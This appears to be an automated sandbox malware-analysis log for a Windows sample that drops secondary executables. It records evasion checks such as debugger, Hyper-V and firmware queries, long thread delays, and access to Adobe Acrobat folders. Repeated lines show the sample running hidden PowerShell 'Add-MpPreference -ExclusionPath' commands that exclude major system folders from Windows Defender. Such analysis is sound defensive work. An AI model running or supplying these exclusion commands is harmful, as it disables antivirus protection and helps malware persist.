Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Reka\rapnewsa.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_23-2515
Source: C:\Reka\rapnewsa.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_23-2603
Source: C:\Reka\rapnewsa.exeSystem information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 5B40000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 5D60000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 5B70000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: B870000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: F870000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: FFB0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 13FB0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UBONg7lmVR.exeWindow / User API: threadDelayed 7687Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeWindow / User API: threadDelayed 2233Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6091Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3698Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7884Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1695Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7716
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1978
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6770
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2099
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7720Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7720Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7852Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 7453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep count: 2099 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C8D40 FindFirstFileW,FindNextFileW,FindClose,23_2_002C8D40
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C8CA0 GetSystemInfo,23_2_002C8CA0
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: UBONg7lmVR.exe, 00000000.00000002.3547008907.0000000003DA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2761737638.0000016AC13FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
Source: C:\Reka\rapnewsa.exeAPI call chain: ExitProcess graph end nodegraph_23-2531
Source: C:\Reka\rapnewsa.exeAPI call chain: ExitProcess graph end nodegraph_23-2525
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Reka\rapnewsa.exeProcess queried: DebugPort
Source: C:\Reka\rapnewsa.exeProcess queried: DebugPort
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C17E0 GlobalHandle,LoadLibraryA,GetProcAddress,23_2_002C17E0
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C1A20 mov eax, dword ptr fs:[00000030h]23_2_002C1A20
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exeJump to behavior
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C8A80 cpuid 23_2_002C8A80
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Users\user\Desktop\UBONg7lmVR.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
